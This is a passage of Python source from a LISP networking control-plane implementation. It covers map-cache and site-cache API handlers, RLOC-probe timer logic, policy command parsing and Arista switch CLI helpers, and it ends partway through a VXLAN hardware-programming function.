entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return Map-Server or Map-Resolver information to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of configured database-mappings, including dynamic data such
# as the translated_rloc.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
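# The lisp_rloc_probe_list{} is keyed by "<rloc>" or "<rloc>:<port>" and
# each value is an array of [lisp_rloc, eid, group] entries, for example
# (hypothetical values):
#
#   lisp_rloc_probe_list["1.1.1.1:4341"] =
#       [[<lisp_rloc>, <eid 10.0.0.0/8>, <group ::/0>]]
#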
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
gleaned_eid, do_probe = lisp_allow_gleaning(eid, parent_rloc)
if (gleaned_eid and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# the same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC-probe if we just received a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have an RLOC address. Copy it now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if the RTR address is in the RTR-list the lisp-itr process learned
# from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
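# For example:
#
#   lisp_format_macs("0050b6aa0001", "0050b6aa0002")
#
# returns "0050-b6aa-0001 -> 0050-b6aa-0002".
#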
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
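# A minimal sketch of the decoding (hypothetical packet contents):
#
#   packet, name = lisp_decode_dist_name("ietf\0<rest-of-packet>")
#
# returns name "ietf" with the packet advanced past the null terminator to
# "<rest-of-packet>". Names longer than 255 bytes return [None, None].
#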
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of 4-element flow entries, the
# last element of which is a lisp_packet. This function is called and run in
# its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
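# A "datetime-range" value is the lower and upper datetimes concatenated,
# 19 characters each (assumed format "yyyy-mm-dd-hh:mm:ss"), for example
# (hypothetical):
#
#   2024-01-01-00:00:002024-12-31-23:59:59
#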
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to an Arista switch so the hardware can be
# configured via its CLI.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista-specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above points to this subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
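# As an illustration of the address-to-MAC mapping done below (hypothetical
# VTEP address), RLOC 10.1.2.3 produces:
#
#   mac        = "00:00:00:01:02:03"   (for "arp -s")
#   arista_mac = "0000.0001.0203"      (for the mac address-table command)
#
# using the hex values of the last three octets of the VTEP address.
#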
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a Python-specific
# signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
